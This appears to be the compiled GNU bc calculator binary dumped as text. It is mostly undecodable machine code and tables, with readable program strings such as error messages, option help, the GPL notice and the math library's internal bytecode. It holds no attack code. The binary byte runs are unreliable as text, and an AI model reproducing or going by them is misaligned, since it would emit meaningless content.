c���5�D  ���y  �   H��  �Fb��H��H����  �C�5��  H�H��  H�=�  H�G覯��������@����@����fD  �=��   ������fD  �=��   ������fD  H�=U  1��z�����b��    �0   �~���A��W�&amp;  �   �z��H�=c�  �a��H�-_�  H���&gt;�H�EH��H�H�  ����H���_����fD  H�!�  Hc0�@����������   �   ��A��A�L$M�A� &lt;:��  &lt;.�  ���D  ��:�!  ��D)�z���A���.u�A�&lt;:�P��  1��     ���A�&lt;:u�1�  A�(���  �   �w���H�D$xI��H�@ �  H�HH�=�  H���  @��:u=�$   �	H���H��    H)�H�T��Ξ  �p�5Ş  �,@��:��  @��.t�H�A@��	w�@�)H��� D��D  ���  H��    H��H)�L�&lt;�    ����FH�D$X1�H��H�t$XH�5��  H��H�D$�(���L�d$X1�H��H�w�  L��@H�D$`H�D$pH�D$hH�D$`H��H�D$(菮��H�D$`D�&lt;$A�$    �     D��H�D$@H�D$hH��H�D$0���H��  A�w��@H��$�   H��$�   H��H�D$8�¬��1�H�D$pL9%�  H�D$�]  H�\$ H�\$H��D�l$HM��@ A�EAEI�U ���   ���  H���z� t�L�|$hH�T$1�L��L�����   �^��H�D$I��H����  H�D$pH�P �p�8�Д��I�l$1�L��I�$H��L���׳��L�l$XL;-+�  ��  L���]����w�H��D�����H��H����H�-!�  H��tH�EH��H��  ���H���Y\��H�5ʜ  H�;1�H�����������H��D��蟞��H��H�����H�-Ĝ  H��tH�EH��H���  脔��H���[��H�5m�  H�;H��蚭���u����H��D���D���H��H���X�H���@���H�-a�  H�E H�}�@H��%���H�E H�UH��H�H��  H�1�  �@H�E ���H���t[����L;�  �����EHE���G  @ A�������I��A�z� t���H�=�&#039;  1����  ��������y]����H�=��  H��p�R������5��  H�=��  �������s�H�=�&amp;  1��U���`�H�=q�  H��B�r��u��tH�R �: ��  ����.��50�  H�=����������   H���  �6\��H��H���v  �CH�H��  H�-��  H�E��[��H���蒩�����H�=�  1�������H�=�  1������������H�\$ D�l$HH����	  �{����  �.   L�|$x肬��L�%S�  �KA�D$L�d$xA9L$�s  L�|$xH�\$ H�l$hH�|$@H�\$(D�l$O�D$H    L�|$�GD  Ic�H�5F&lt;  �&lt;����H�T$1�L��H�����H�D$ L�d$x�HA;L$��  H�|$`H��H�����L�|$`I�W A�wA�?�.���H�|$��I���o���H�t$X1�H��L���ͩ���&lt;$�s���H��$�   Ic��r�T$H�����D$H   �b���D�$$H�\$ D�l$HH�l$�-f�     Hc�H�v;  �&lt;8�M���L���X��H���  I��H�mI�?A��~�H��$�   �   �p觫���ȋ��  L�`(H��    H)�I�T����  �p�5��  �&lt;:��  L�-�#  M���k  H�l$�Kf�     �L�g�  M�d$H��    H)�I�T��@�  �H�7�  �&lt;:�-  M���  A�,$&lt;0��   &lt;1��   ��yV��H�=E#  ��Hc�H�ї  H�4�1��&amp;��I��H�-C�  H���r���H�EH��H�,�  ���H���wW���R���f�H�y�  Hc�L��H�4�1������fD  ���~����   �X��H���A  H�^�  Hc�H�-̗  H��H�H�PH�U H�H���  �BH�U H��i��� ��y�H���  H� H�P �p�8�܎��1���H���@���A�&lt;$跛��A�$��9��9  H�5ʖ  Hc�H�H��H�,�E�L$L�E����  �EL�E ����   �=X��H����  H��  L� H�PH��  ���D�l$OL�|$L���ǎ��H�|$轎��H�|$(賎��H�|$0詎��H�|$蟎��H�|$8蕎���2����   H���  �W��H��H����  �C�5��  H�H���  H�=��  H�G�����Z�H�l$H�=�  1��7���L� �  H�$I�\0H��tf��;艚��H�[H��u�   �ŕ  �@W��I��H����  H��  A�$�   L�%��  D�-��  I�D$�W��H��H���L  L�`�   D�%ȕ  D�(H�ƕ  ��V��H���$  D� L�^�  1�E1�H�XH���  ��-6�  �0�      ����q�  =�����  ���]�  � ����H���J��H�5+�  H�81�H���f����1���+�  ���*  ����  ���蠖��H�����H�5�  H�8H�����������   H�Ԕ  �V��H��H��tS�C�5͔  H�H�۔  H�=Ԕ  H�G�s������H�G�  H��H���  �   H��U��H������Ϗ���    �z�  ����  ���h�  �#��]�  ����  ���K�  ��H�5G�  �
   ���      ��T����1�����1�1��{�D�$$�y����\��0   ����D�K�I�1�H�=+  E1��˽��1���1�H�=  趽��H�-ϓ  1��&gt;�H�=�  1�蚽��L�%��  ����.���C�  1�A�(��u$@����  @����  �   1�@��	��  �k���H�D$xH�H I����H�l$M���������   E1��z������A�����Y��   E1��^�����A�����=��   E1��B�����A������A�&lt;$ ��   M���������������H�=;  1�裼���5a�  �I�����H�=�  1�襽�����H�=g  1�蒽���}���   H�a�  �S��H���z�����fD  �E �   L�D$�uS��H�������L�D$H�D$A�pI�8f�p����H�L$H�H�M ����H���  Hc�H�,�H�M����H�=�  1��������M�|$����E1�A�����I�1�@�����(�H�=�  1�轼������   H���  ��R��H���
���H���  �CA��H�H�PH���  D�%�  D���k��H�K�  L�|$x@��L���@H�D$x�����   H�\$x�bR��H�������H�:�  H�H�0�  H�P�  D�`�1�E1��|�&lt;.t:���  1�A�(�x�   H�Ő  �R��H���A����F���f.�     ��1���e�  A�(��� ���1��$��Z������P��D�$$�X���@ AWH��AVAUATUSH��(dH�%(   H�T$1�H�|$�?@����   H�\$L�%~.  �/@��&quot;u�h�   H�PH�T$�8肥��H�D$�8@����   D�z�  E����   �=/�   u��=%�   ��   @��
�1  @��:��  @��.t�@��Fv;D�Ԑ  �Ґ  E���  ��t!H�=g  1�裯����  �  �     H�T$H�B�:@H�D$�  �:��0@���ʤ��H�D$�8@���H���f�     H�D$dH+%(   �z  H��([]A\A]A^A_�D  @��Zw&quot;@��	vJ�W���PwB��Ic�L�&gt;���    �O���w&amp;�   H���@ ��   ����  ���  �-���H�T$H�BH�D$���f.�     H��H�D$���f������H�=�  1������  H�T$H�B�:@H�D$��  ���H���D  �:��7@��豣��H�D$�*����    �m�   ����@ H�PH�T$�8����H������H��H���|  �t�  ���/������U���H�T$�#���H�PH�T$�8�:���H���ҡ��H��H=��  ��  D�,�  E�����������D��  H��H��E�����������    ���  H�T$���H�PH�T$�@&lt;i�  &lt;r������e��H�T$���H�PH�T$�8蚢��H���2������  H��H���T  ��u���t����~�  H�T$�&lt;,u6H�rH�t$�BH���$H��H�T$�z���u�:����D�  H�T$�&lt;:u؅�������:   ����H�T$����K   �����ό  H�T$����H��H��H�D$耠�����  I��H��H��    H��A��?H)�H��  H��H�i H���J  H��u�Rf�H��H��tGH��   H��u�  H�$�MM��H���M  H�$H��   Hǀ       H��   H��u���&amp;�  H�T$J�D� ����H��H��H�D$�ʟ����H�$I��謄��H�D$H�PH�T$�8.�-  Ic�L�,�    I)�I���L�H��舟���   L�u(I���L��H����  D�8�@    L�pH�E(H�D$H�PH�T$�8.��   �P��.��   H�-�  L�*u�H��H��H�D$�����   L�u(I���7L��H���7  D�8�@   L�p�H�PH�T$�8�=����5G�  H�T$�������:�&quot;���H�T$����  H�=k�  H��    H)�H��� H���  H�T$H���  ���H�PH�T$�&lt;[tnHc4$H��    H)�H�5�  H�,��    &lt;,u	H��H�T$H���;����   L�u0I���ZK��H���Z  H�T$D�(�@    L�pH�E0�&lt;[u�H�4�  �.�      H�S�  �$��  ����D  ��������R����������H��H���π@��������  @��������������  ������  �������H��H���π@���͞���׈  @������������fD  1��9����w�   H�T$H�j�      �_�   �^���H�o�  �   �   H�=�  �J���   �J���  H�T$H�$�J��H�$H�T$H��H��tH�A Hǀ       �~���������H��ff.�     f��Ɖ  S���C  �=��   uxH���  H����  H�8H�5�  �I��H��H���z  �=^�   �@  H�=Y�  H��  �C�   H�H�!�  H�GH�6�  �G���   [�f.�     H�=  ��I���   H���&#039;���H�=�  ��I���   H������H�=�  ��I���   H�����H�=�  �I���   H���ܮ��H�=X  �I���   H���î��H�=�  �wI���   H��誮��H�=�  H��t H��  �    ���H�{H��H��u�H�W�  H�������=?�   H�`�  t=H��  �   [�&quot;�   ��  �f�H�=ɇ  �$G������    H�!�  H�=��  �G���H��  H�=5�  �   H��  H�1��H���   �eH��D  USH��H�C�  �8�  H�K���uUH�;�  H�5,�  H�4�Hc��  HVH9�r3H�	�  H�-�  荧����tD��t3����   H��  �H�K�S� H�φ  �ņ  H��[]�f�H�=ن  �d����=�   ���     u1�\�����t(�j�  ���@���H�=��  �.����/���f�     H�������[]�@ H)�Hc�H;�  �H�K�j����    �Ά  UH�����  ��t;H��H�5�  �   1���F��H���E��ۄ  �Մ  ��&lt;]�f.�     ]���f.�     �
   ��D��]���      �f.�     ���  ���  ��t�=x�   uF�|�      � ��t�H����  ��u.����=J�   u?�N�      H���f�     �ۊ�� H�=$  �D���=�   ��      t�H��鰊����H��H���                                                                                                                                                                                                                                     
(interrupt) Exiting bc.
 chilqswv 1.07.1 bc %s %s
%s
 @i %ld *%d, *%d (standard_in) %s %d:  read() in flex scanner failed %s %d: Error:  %s %d: (Warning)  multiple letter name - %s Too many array variables Too many functions Too many variables negative ibase, set to 2 negative obase, set to 2 negative scale, set to 0 ibase too small, set to 2 ibase too large, set to 16 ibase too large, set to 36 obase too small, set to 2 obase too large, set to %d scale too large, set to %d number.c non-zero scale in exponent exponent too large in raise Stack error. Internal error. Function %s not defined. Parameter number mismatch Return from main program. ibase too small in -- obase too small in -- ibase too big in ++ obase too big in ++ Scale too big in ++ history set to unlimited Divide by zero Modulo by zero divide by zero bad instruction: inst=%c 
interrupted execution. Error in numeric constant Program too big.
 l a j File %s is unavailable.
 BC_ENV_ARGS POSIXLY_CORRECT BC_LINE_LENGTH (main) illegal character: # NUL character in string. Commas in numbers illegal character: ^%c illegal character: \%03o illegal character: %s For details type `warranty&#039;.  newline not allowed 
%s BC_BASE_MAX     = %d
 BC_DIM_MAX      = %ld
 BC_SCALE_MAX    = %d
 BC_STRING_MAX   = %d
 MAX Exponent    = %ld
 Number of vars  = %ld
 comparison in expression W w Break outside a for/while Continue statement Continue outside a for first expression is void second expression is void B%1d:J%1d: third expression is void pJ%1d:N%1d: void expression Z%1d: print statement O void expression in print P else clause in if statement J%d:N%1d: duplicate parameter names Variable array parameter duplicate auto variable names * not allowed here F%d,%s.%s[ 0R] void functions Call by variable arrays comparison in argument void argument K%d: Return outside of a function. DL%d: S%d: s%d: &amp;&amp; operator DZ%d:p void expression with &amp;&amp; DZ%d:p1N%d: || operator B%d: void expression with || B%d:0J%d:N%d:1N%d: void expression with ! ! operator = { &lt; } &gt; void expression with + void expression with - void expression with * void expression with / void expression with % void expression with ^ void expression with unary - K C%d,%s: C%d: DA%d:L%d: DM%d:L%d: i%d:l%d: d%d:l%d: DL%d:x A%d: M%d: i%d: d%d: void expression in length() cL void expression in sqrt() cR void expression in scale() cS read function cI random function cX void expression as subscript comparison in subscript History variable Last variable End of line required Too many end of lines syntax error memory exhausted @iK20:s2:p@r J7:N4:0R]@r 1/R0R]@r compile help interactive mathlib quiet standard version warn     Fatal error: Out of memory for malloc.
   -l  --mathlib      use the predefined math routines
    -i  --interactive  force interactive mode
      -h  --help         print this usage and exit
 usage: %s [options] [file ...]
%s%s%s%s%s%s%s     -v  --version      print version information and exit
          -w  --warn         warn about non-standard bc constructs
       -s  --standard     non-standard bc constructs are errors
       -q  --quiet        don&#039;t print initial banner
        Copyright 1991-1994, 1997, 1998, 2000, 2004, 2006, 2008, 2012-2017 Free Software Foundation, Inc.       out of dynamic memory in yy_create_buffer()     out of dynamic memory in yyensure_buffer_stack()        fatal flex scanner internal error--end of buffer missed fatal error - scanner input buffer overflow     out of dynamic memory in yy_get_next_buffer()   Runtime error (func=%s, adr=%d):        Runtime warning (func=%s, adr=%d):      ibase larger than 16 is non-standard    history too large, set to unlimited     accum-&gt;n_len+accum-&gt;n_scale &gt;= shift+count      Array %s subscript out of bounds.       Parameter type mismatch parameter %s.   Parameter type mismatch, parameter %s.  function stack underflow, contact maintainer.   Square root of a negative number        scale can not be negative in --         history is negative, set to unlimited   Non-standard base in numeric constant   EOF encountered in a comment.
  fatal flex scanner internal error--no action found      This is free software with ABSOLUTELY NO WARRANTY.      
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 3 of the License , or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program. If not, write to

       The Free Software Foundation, Inc.
       51 Franklin Street, Fifth Floor
       Boston, MA 02110-1335  USA
  Comparison in first for expression      Comparison in third for expression      variable in both parameter and auto lists       Missing expression in for statement     comparison in return expresion  return expression requires parenthesis  return requires non-void expression     Return expression in a void function.   Assignment of a void expression void expression with comparison void expression in parenthesis  @iF1,5.6,7,8,9,10,11,12,13,14,15[l0:KA:#Z1:l0:s7:pKA:s0:pl5:C1,0:       s14:pl7:s0:pl14:RN1:l5:0&lt;Z2:1s12:pl5:ns5:pN2:l2:s15:pK6:l15:+   K.44:l5:*+s13:pl5:cS1+s2:pN3:l5:1&gt;Z4:l10:1+s10:pl5:K2:/s5:pl2:  1+s2:pJ3:N4:l13:s2:p1l5:+s14:pl5:s6:p1s8:pK2:s11:pN6:1B7:J5:N8: l11:i11:pJ6:N7:l6:l5:*s6:l8:l11:*s8:/s9:pl9:0=Z9:l10:0&gt;Z10:N11: l10:d10:Z12:l14:l14:*s14:pJ11:N12:N10:l15:s2:pl12:Z13:1l14:/R   N13:l14:1/RN9:l14:l9:+s14:pJ8:N5:0R]@r  @iF2,5.7,9,10,11,12,13,14,15[l0:KA:#Z1:l0:s7:pKA:s0:pl5:C2,0:   s14:pl7:s0:pl14:RN1:l5:0{Z2:1K10:l2:^-1/RN2:l2:s15:pK6:l2:+s2:  pK2:s10:p0s11:pN3:l5:K2:}Z4:l10:K2:*s10:pl5:cRs5:pJ3:N4:N5:l5:  K.5:{Z6:l10:K2:*s10:pl5:cRs5:pJ5:N6:l5:1-l5:1+/s13:s14:pl13:l13:        *s12:pK3:s11:pN8:1B9:J7:N10:l11:K2:+s11:pJ8:N9:l13:l12:*s13:l11:        /s9:pl9:0=Z11:l10:l14:*s14:pl15:s2:pl14:1/RN11:l14:l9:+s14:pJ10:N7:     @iF3,5.7,9,11,12,13,16,14,15[l0:KA:#Z1:l0:s7:pKA:s0:pl5:C3,0:   s14:pl7:s0:pl14:RN1:l2:s15:pK1.1:l15:*K2:+s2:p1C4,0:s14:pl5:0   &lt;Z2:1s12:pl5:ns5:pN2:0s2:pl5:l14:/K2:+K4:/s13:pl5:K4:l13:*l14:  *-s5:pl13:K2:%Z3:l5:ns5:pN3:l15:K2:+s2:pl5:s9:s14:pl5:nl5:*s16: pK3:s11:pN5:1B6:J4:N7:l11:K2:+s11:pJ5:N6:l9:l16:l11:l11:1-*/*   s9:pl9:0=Z8:l15:s2:pl12:Z9:l14:n1/RN9:l14:1/RN8:l14:l9:+s14:p   @iF5,5.7,14,15[l0:KA:#Z1:l0:s7:pKA:s0:pl5:C5,0:s14:pl7:s0:pl14: RN1:l2:s15:pl2:K1.2:*s2:pl5:1C4,0:K2:*+C3,0:s14:pl15:s2:pl14:   @iF4,5.6,7,9,10,11,12,13,16,14,15[l0:KA:#Z1:l0:s7:pKA:s0:pl5:   C4,0:s14:pl7:s0:pl14:RN1:1s12:pl5:0&lt;Z2:1ns12:pl5:ns5:pN2:l5:1   =Z3:l2:K25:{Z4:K.7853981633974483096156608:l12:/RN4:l2:K40:{Z5: K.7853981633974483096156608458198757210492:l12:/RN5:l2:K60:{Z6: K.785398163397448309615660845819875721049292349843776455243736  :l12:/RN6:N3:l5:K.2:=Z7:l2:K25:{Z8:K.1973955598498807583700497  :l12:/RN8:l2:K40:{Z9:K.1973955598498807583700497651947902934475 :l12:/RN9:l2:K60:{Z10:K.197395559849880758370049765194790293447585103787852101517688    :l12:/RN10:N7:l2:s15:pl5:K.2:&gt;Z11:l15:K5:+s2:pK.2:C4,0:s6:pN11: l15:K3:+s2:pN12:l5:K.2:&gt;Z13:l10:1+s10:pl5:K.2:-1l5:K.2:*+/s5:   pJ12:N13:l5:s13:s14:pl5:nl5:*s16:pK3:s11:pN15:1B16:J14:N17:l11: K2:+s11:pJ15:N16:l13:l16:*s13:l11:/s9:pl9:0=Z18:l15:s2:pl10:l6: *l14:+l12:/RN18:l14:l9:+s14:pJ17:N14:0R]@r      @iF6,13,5.6,7,8,9,10,11,12,16,14,15[l0:KA:#Z1:l0:s7:pKA:s0:pl13:        l5:C6,00:s14:pl7:s0:pl14:RN1:l2:s15:p0s2:pl13:1/s13:pl13:0&lt;Z2:  l13:ns13:pl13:K2:%1=Z3:1s12:pN3:N2:1s10:pK2:s11:pN5:l11:l13:{   B6:J4:N7:l11:i11:pJ5:N6:l10:l11:*s10:pJ7:N4:K1.5:l15:*s2:pl5:   l13:^K2:l13:^/l10:/s10:p1s9:s14:pl5:nl5:*K4:/s16:pK1.5:l15:*l10:        cL+l10:cS-s2:p1s11:pN9:1B10:J8:N11:l11:i11:pJ9:N10:l9:l16:*l11: /l13:l11:+/s9:pl9:0=Z12:l15:s2:pl12:Z13:l10:nl14:*1/RN13:l10:   l14:*1/RN12:l14:l9:+s14:pJ11:N8:0R]@r                           �a���`���`���`���`��Va��Ja���`���`��;a���`���`���`���`��,a���`��a���`���`���`���`������ĭ��)���ĭ��}������ĭ��ĭ��ĭ��Ը������ĭ��ӹ��ĭ�����e�������ĭ��ĭ��ĭ��ĭ��ĭ��ĭ��ĭ��ĭ��ĭ��ĭ��ڴ��o�������ĭ��ĭ����D���ƿ��O���ĭ��ĭ��ĭ��ĭ��ĭ���������.�������ĭ��&lt;���L���ĭ����w���J���ĭ��ĭ��L���ĭ��ĭ��D���ĭ��ĭ��ĭ������ĭ��ĭ��ĭ��ĭ����������ĭ��ĭ��ĭ��*���1���ĭ��ĭ������ĭ������ĭ������ĭ��ĭ����ĭ��ĭ��ĭ�����D���ĭ��ĭ������پ��}���:�������������������������������������������Q��V���ݹ��ݹ��ݹ��ݹ��:������ݹ��ݹ��ݹ�����ݹ��ݹ��ݹ��ݹ��ݹ��ݹ��ݹ��տ��ݹ��ݹ����������ݹ������������������������������������������������������������������������������&lt;�����������������������������������������������������������������������������������������M��������y�������������������������������3��������������������������������������X&#039;��X&#039;���?��X&#039;���2��J:��8:��X&#039;��%:��:��X&#039;��X&#039;��X&#039;��:��X&#039;��X&#039;��X&#039;��X&#039;��X&#039;��X&#039;���9���9���8��;���:���:��T:���(���:���:���:��@���&gt;��w&gt;���8��;8��L&lt;���-���-��?-��.-��-��X&#039;��X&#039;��X&#039;��8���7��X&#039;���7��X&#039;��G7���1��x1��XA��PA��X&#039;��~A��&lt;&gt;��GA��*A��w;��E;���@���@��A��&lt;���2���2��X&#039;���2��1���0���0��p0��X&#039;��80���/���/���.���5��5��{5��x4��t6���&amp;��+6��;2���6���6��/4���3���.��R.���;���;���&lt;���&lt;���A��2���1���1��E&gt;���@���.���3���3��~3��f3��@3��3��3��X&#039;���2���C���C��aC��pC���C���I��gG���G���G���G��H��HH��uH��4C��VI���B��C���H���H���H��)I���&#039;���@���@��&amp;A��SA���A���A���&#039;���&amp;���B��D��HD���&amp;��*G��JF���F��[@���@��G��6)���*��aE���E��uD���D��6E���A��9+��9+��    _bc_shift_addsub                0123456789ABCDEF                     	 
                               ! &quot;     #     $ % &amp; &#039; (     ) *    +  , - . / 0 1 2 3 4 4 5 6 4 7 8 9 : 4 ; &lt; = : 4 &gt; 4 ? , @ A B C D E F G H F F I F F J K L M N F F O P F 4 Q 4 X X h [ Y � � V V Y i Z V \ _ ] a t _ _ ] _ ^ _ j r l S k s m u w _ n T � ~ � x � � � �  �  � � �  � � � � � � � � � � | � � � � � � � � � � T � ~ � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � \ � ] � � � � ] � ^ � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � Y � � � � Y � Z � � � � � � � � � � � � � � � � � � � � � � � � � � � � � �  � � � � � � � � � � � � � � � � �  � )*,+.� � � -8� � � /� � � � 0� � 956� � � 7� :� � � � 432� T T T z 1z } } } � � � � � � (&#039;&amp;%$#&quot;!� � � � � � � � 
	� � � � � � � � � � � � � � � � � � � � � � � � � � � � � � ] � { � � � � � � � � � � � � � � � � � � � � � ] � U R � � �  ` | |  �  | { y v q p o g f e d c b V ` S S V W V U S R ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;                                                                                                                                              !   � �    !      =(       &quot; &#039; #  &quot; &#039; # ( *  # 0 6 0 8 * 7 9 D 8 6 8 7 : &lt; : 9 D &lt; &lt; : &lt; : &lt; B A C &lt; A E B O :&lt; @ E K O } K } � C � @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ G N H I 9J H I G M P I � M � N � P � N G H s I J � Y \ � M P Y \ Y \ ] � ] � � � s ] � ] � � � � � � � � � � � � � � � � � � � � � � � � � � � � 5� � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � �  � � � 3 +4+0061/6.-,*)(#4&lt;&lt;&lt;&gt;!&gt;??? 
� � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � { x w v u t r q p o n m l j i h g f e d c b ^ Z T R Q L F ? &gt; = ; 5 3 2 / - + ) &amp; % $              
 	   ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;                                    6   )*&amp;*!**a ` ` e k t ������  S h k ���j ` �q �  *��   �  �� � � � � �� �	�� { } � p � �� � � � � �� � � � �*****� *� � **  ���������  �������� �����*  �  �         � �  � � �  �C � � � � � � � � �� � � � � � � � � � � � �   � ������  �����������������#�)�� �%&#039;&quot;45�/);.6  ���    ��  ����  �  ��    ���:89��7C�=?PB�J�HV��[Y  ���  ��    ��  �  R\Q~ZU}|W_{dzu  l        oml^kjigcv  Qp� e    �  *�z ��                                                                                                                                                                            ; ; ;;;;;&lt;;;;;;;;;;;;;;;;=================;&gt;&gt;;&gt;?&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ &gt;;;&lt;;;;;;;;;;;;;========================;&gt;&gt;&gt;?&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ &gt;;;;;;=======================&gt;&gt;&gt;&gt;@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ ======================@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ ==============@ @ @ @ @ @ @ @ @ @ @ @ @ @ ========@ @ @ @ @ @ @ @ ===@ @ @ ==@ @   ;;;;        / - ( &amp;   -  ! !  !    ! , $ &quot; $ -  * * * * * * * * * * * * * * * * * -                                       ( $   + &quot;  % ,   ) , ,   # &#039; * * * * * * * * * * 
 * * * * * * * * * * * * *                                          ,     ,   * * * * * 	 * * * * * * * * * * * * * * * * *                             * * *   * *  * * * *  *  * *   * *                        * * *  * *   * *  *                *  *     *         *  *                                                                                                                                           	   
                                                                                                                                                                                        !   &quot;   #   $   %   &amp;   &#039;   (   )   *   +   ,   -   .   /   0   1   2   %   3   %   4   5   6                                                                                                                                                                                                                                                                                                                                                                                                         �� ! � &quot; @ A $ 5 � � � � 7 � &lt; ^ _ � � % � 1 � � � P Q v 3 &amp; o f g &#039; �                         p�p�p�q�p��  ��p�p�p�p�p�p�p�p� p�p�p�p�p�p�p�p��p�p�s�p���p�p�p�� p�                         566777889999::::::;;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;=&gt;?@&lt;A&lt;BC&lt;&lt;D&lt;EEFFGHGJIKKLLMMMNNNNNNNNOOPPPPQQRRTSUSVSSSSSSSSSSSSSSSSSSSSSWWWWWWWXXX                                                           g] 4 K % kij  m)l    
\SC gk`5  L        [    OQ       Mag DE   I    ef-*+.^ (  TUVWXYZ  _ h6b J#&amp;cd PRNFgG;   7 ,     I H&lt;   ?   / =&gt;n    0$&#039;o8@  Ip 2AB    !19: 3 &quot;                          ) # * � b B 0 � � + � 4 b 2 , � G H I J K L + , M + N p = &gt; � � � � 6 8 � � 9 : ; R S D E c C L U d F � W c Y Z � � ` [ ) � T � � V X e h i j k l m n � � G H I J K L \ w r y q t | s I J K L � ~ � } �  � � � � � � � � � S  �   � �  � � �  ` � � �  D    �   F �  � � � S  F �  � w � � �  � � /     �     �   G H I J K L     G H I J K L   w             �             ��  �          	 
                       ?  �       ��    
                                       �     �?   �               
                                       �     �?   �               
                                    �                                                    (          �    
                          D E          F      D E           F   D E           F             G H I J K L     a     G H I J K L     u G H I J K L D E x -       F   D E           F   .                           G H I J K L     z G H I J K L     {            
                                ]                                                                             O                                     �                                    D E         F                                                    G H I J K L    �   % � � -    - 2  &amp; &#039; ( ) * + - 2 
 -  2   2    - - � � - - - + ,   , , + 2 0  � 6 , 8 9 , 0 &lt; . ? 1  ( ( - - C F G H I J K L 4 4 &amp; &#039; ( ) * + . V 1 X . - 1 3 ( ) * + 2 c , b  f g  . 1  . 3 2 o p  r  	 2 /  3 3 2  |   ,            3 2 2 � $  3 &#039; . � � 3 � - | �  ����3 ����� ��&amp; &#039; ( ) * + ����&amp; &#039; ( ) * + ��� ������������� ��������   �� ���    	 ����          ��   ��       ! &quot;  $  ��&#039;    	 , -  /         ��   ��       ! &quot; ��$ ����&#039; ��������, - ��/ 0  �� ����   	 ���� ��        ��   ��       ! &quot; ��$ ����&#039; ��������, - ��/ 0  �� ����   	 ���� ��        ��   ��       ! &quot; ��$ ����&#039;  �� 	 , -  / ���� �������� ��   ��  ���� ��������$ ����&#039; ������ ��-    	 ��3  ��        ��   ��       ! &quot; ��$   &#039; �������� - ��/   ���������� ��  ���������� ������������&amp; &#039; ( ) * + ����. ����&amp; &#039; ( ) * + ����. &amp; &#039; ( ) * +   .  ������ ��  ���������� ��   ���������� ��������$ ����&amp; &#039; ( ) * + ����. &amp; &#039; ( ) * + ����.    	 ���� ��        ��   ��       ! &quot; ��$ ����&#039;    	 ��-  / ���� �������� ��   ��  ����  �� 	 $ �� &#039; ���� ����- �� ��   ��  ����  �� 	 $ �� &#039; ���� ����- �� ��   ��  ����  �� 	 $ �� &#039; ���� ����- �� ��   ��  ���� ��  ��$ ����&#039;  ��������- ������������������������������������������&amp; &#039; ( ) * +  *4-.(&amp;1&#039;),23+/0	
 !&quot;#$%                           p�� p��Sp��p���p�p��Sp���p�����p�p�����p�p�p�p�p�p�p�SS� p� p�p�p�� p�p�� mS�p�p�p�6 Sp�� S SS % 9p�� p�p�&gt;p�p�SSSSSSSp�p��) $ �&#039; + �S�S��p�p�p�p�( �p�p�p�SS�3 3     Si p��p� p�5 �p��p�p�9p�p�� { �p��- [ ^ 9 7 p�f &lt; p�`8 : A f  Sp�f p�p�C D E F s t Q m p�p�� V X Y p�p�p�p�p� p�\ a Sf p� p�p�p�c  � p�p�p�p�	 f p�p�;@  G   T�t  4����  ����  ���`  �*��\  �+���  �,���  �,��  4-��$  T.��H  �.��\  �.��x  $/���  �/���  �/���  �0��  D1��X  2���  42���  d2���  �4��(  46���  T7���  t8��T  �8��x  D;���  �;���  t&lt;��8  �&lt;��d  �&lt;���  �=���  �&gt;���  d?��  $@��L  �@��x  �A���  �C���  �E��@	  G���	  H���	  �H���	  �I��
  TJ��X
  �J��x
  dK���
  DL���
  �L��  tM��0  tS���  TT���  �T���  �V��0  X��X  D\���  ^��  �`��h  �a���  c���  $f��   �g��@  �r���  �s���  4w��,  Ty��x  }���  �}��  d���p  4����  $����  4���  ����@         zR x�        P(��&amp;    D    $   4   ���   FJw� ?:*3$&quot;       \   ���          D   t   �(��5   P�B�I �B(�A0�A8��
0D(B BBBF      �   �)��          �   �)��8           �   *��   A�j
EX
X      +��D            @+��&#039;    EAU     8  T+��I    I�wH� 4   T  �+���    A�C�D s
AACR
AAD     �  �+��)    F�\F� $   �  �+���    A�D�O �AAD   �  l,���    K�B�D �A(�D0q
(D� A�B�B�HX����  (     �,���    J�A�G �AAE��    D  x-��-    AAR     `  �-��-    AAU  h   |  �-��4   B�I�E �B(�H0�H8�FP�XO`OhOpKP�XO`OhOpKPj
8A0A(B BBBA  `   �  t/���   B�B�B �B(�A0�A8�D@.
8A0A(B BBBJL
8D0A(B BBBG`   L  �0��   B�B�B �B(�A0�A8�D@�
8A0A(B BBBJL
8D0A(B BBBG `   �  \1��   B�B�B �B(�A0�A8�D@�
8A0A(B BBBJL
8D0A(B BBBG       2��G    K�M
Ha
A  H   8  D2��t   B�E�B �B(�A0�A8�G`�
8A0A(B BBBA    �  x4��{    A�z
Eu
A  L   �  �4���    B�E�A �I(�D0P
(D ABBBj
(D ABBA   (   �  45��/    B�D�C �]
ABA   $  85��F    I�gP�A�   D  h5���    D�
H 8   `  6��(   B�B�A �D(�G0�
(A ABBH (   �  7��c    B�A�L A
DBA @   �  T7���    A�A�D d
AADA
AAEu
AAA (     �7���    A�D�D \
AAI ,   8  t8���    B�E�H �\
BBA   H   h  �8���   B�B�E �E(�A0�A8�DP�
8D0A(B BBBDH   �  �:��   B�E�E �B(�A0�A8�DP�
8D0A(B BBBD@      \&lt;��e   B�B�B �A(�A0�G`�
0A(A BBBB 8   D  �=���    B�B�E �D(�D0�q
(A BBBG8   �  &lt;&gt;���    B�B�D �D(�I0o
